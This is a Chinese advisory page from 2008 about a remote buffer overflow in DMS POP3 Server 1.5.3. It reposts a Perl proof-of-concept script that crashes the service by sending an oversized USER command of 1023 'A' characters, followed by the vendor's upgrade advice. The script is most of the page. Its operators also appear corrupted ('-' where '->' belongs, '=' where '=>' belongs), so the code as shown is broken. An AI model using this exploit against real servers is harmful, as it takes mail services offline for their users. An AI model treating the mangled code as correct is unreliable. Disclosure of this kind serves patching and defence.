DMSPOP3Server远程缓冲区溢出漏洞

王朝other·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

Reed Arvin (reedarvin@gmail.com)提供了如下测试方法:

#===== Start DMS_POP3_Overflow.pl =====

#

# Usage: DMS_POP3_Overflow.pl

#

DMS_POP3_Overflow.pl 127.0.0.1 110

#

# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37

#

# Download:

# _blankhttp://www.digitalmapping.sk.ca/pop3srv/default.asp

#

# Patch:

# _blankhttp://www.digitalmapping.sk.ca/pop3srv/Update.asp

#

#####################################################

use IO::Socket;

use strict;

my($socket) = "";

if ($socket = IO::Socket::INET-new(PeerAddr = $ARGV[0],

PeerPort = $ARGV[1],

Proto

= "TCP"))

{

print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";

sleep(1);

print $socket "USER " . "A" x 1023;

close $socket;

sleep(1);

if ($socket = IO::Socket::INET-new(PeerAddr = $ARGV[0],

PeerPort = $ARGV[1],

Proto

= "TCP"))

{

close $socket;

print "failed!\n";

}

else

{

print "successful!\n";

}

}

else

{

print "Cannot connect to $ARGV[0]:$ARGV[1]\n";

}

#===== End DMS_POP3_Overflow.pl =====

建议:

--------------------------------------------------------------------------------

厂商补丁:

Digital Mapping Systems

-----------------------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载DMS POP3 Server 1.5.4.27:

_blankhttp://www.digitalmapping.sk.ca/pop3srv/Update.asp

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航